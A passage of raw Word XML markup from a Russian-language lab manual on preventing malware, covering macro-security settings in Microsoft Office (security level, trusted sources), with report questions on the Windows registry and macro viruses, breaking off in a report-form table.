      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Защита от макр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>сов</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:object w:dxaOrig="8935" w:dyaOrig="3938">
          <v:shape id="_x0000_i1074" type="#_x0000_t75" style="width:424.2pt;height:187.2pt" o:ole="">
            <v:imagedata r:id="rId112" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.6" ShapeID="_x0000_i1074" DrawAspect="Content" ObjectID="_1756035126" r:id="rId113"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="111"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Открыть вкладку </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Уровень безопасности</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="111"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Выбрать нужный уровень безопасности. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="t"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="304800" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="1" name="AutoShape 51" descr="bluedr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E308A3" id="AutoShape 51" o:spid="_x0000_s1026" alt="bluedr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ArxtsuwIAAMkF&#10;AAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQBMoOks2AAA&#10;AAMBAAAPAAAAAAAAAAAAAAAAABUFAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAGgYA&#10;AAAA&#10;" filled="f" stroked="f">
                <o:lock v:ext="edit" aspectratio="t"/>
                <w10:anchorlock/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:object w:dxaOrig="3595" w:dyaOrig="3356">
          <v:shape id="_x0000_i1076" type="#_x0000_t75" style="width:243pt;height:226.8pt" o:ole="">
            <v:imagedata r:id="rId114" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.6" ShapeID="_x0000_i1076" DrawAspect="Content" ObjectID="_1756035127" r:id="rId115"/>
        </w:object>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2C1237">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>В зависимости от настроек безопасности макросов, например средний уровень, при открытии макросов выводится предупреждение [Предуп</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>р</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>еждение об установленных ш</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>блонах и надстройках, которые содержат макросы] и предоставляется возможность запретить выполнение макросов для установле</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ных шаблонов и настроек</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="glossarydef"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(в том числе для мастеров).</w:t>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2C1237">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:caps/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4023360" cy="2377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23360" cy="2377440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="111"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Откройте вкладку </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Надежные источники</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="111"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Если снять флажок (5)</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> «</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Доверять всем установленным надстро</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>й</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>кам и шаблонам»</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="5940"/>
          <w:tab w:val="left" w:pos="6120"/>
          <w:tab w:val="left" w:pos="6300"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:object w:dxaOrig="7433" w:dyaOrig="3356">
          <v:shape id="_x0000_i1078" type="#_x0000_t75" style="width:371.4pt;height:168pt" o:ole="">
            <v:imagedata r:id="rId117" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.6" ShapeID="_x0000_i1078" DrawAspect="Content" ObjectID="_1756035128" r:id="rId118"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="proclabel"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="proclabel"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>то при запуске приложения загрузка всех прописанных в приложении макросов будут сопровождаться предупреждением системы безопасности. Да</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ный шаг может производиться опытными пользователями при анализе причин неустойчивой работы приложения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="proclabel"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:caps/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="proclabel"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>В отчете отразить следующее:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="109"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="426"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="800080"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Сформулировать определение </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>реестра операционной системы. К</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>кая утилита применяется для просмотра реестра.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="109"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="426"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="800080"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="800080"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Исследовать</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:color w:val="800080"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="800080"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>содержимое</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:color w:val="800080"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="800080"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ключа</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:color w:val="800080"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:b/>
          <w:color w:val="800080"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">RegisteredOrganization </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:color w:val="800080"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>из</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:b/>
          <w:color w:val="800080"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:color w:val="800080"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>катал</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:color w:val="800080"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:color w:val="800080"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>га</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:b/>
          <w:color w:val="800080"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="109"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="426"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="008000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="800080"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Дать определение вируса, макровируса. Сформулировать условия </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>существования вирусов в конкретной системе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="109"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="426"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="008000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="008000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Исследовать порядок формирования политики защиты от макров</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="008000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="008000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">русов при использовании приложения Microsoft Excel </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="800080"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и описать маршрут де</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="800080"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>й</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="800080"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ствий пользователя при установке разрешения запуска только подписанных макросов из надежных источников при этом все неподписные макросы должны отключаться автоматически.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Отчет</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> о выполнении лабораторной работы № ________</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Тема: </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:caps/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Профилактика проникновения вредоносного пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:caps/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:caps/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>граммного обеспечения</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:caps/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>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0" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="01E0" w:firstRow="1" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="279"/>
        <w:gridCol w:w="279"/>
        <w:gridCol w:w="279"/>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54"/>
        <w:gridCol w:w="254"/>
      </w:tblGrid>
      <w:tr w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidTr="00D20130">
        <w:tblPrEx>
          <w:tblCellMar>
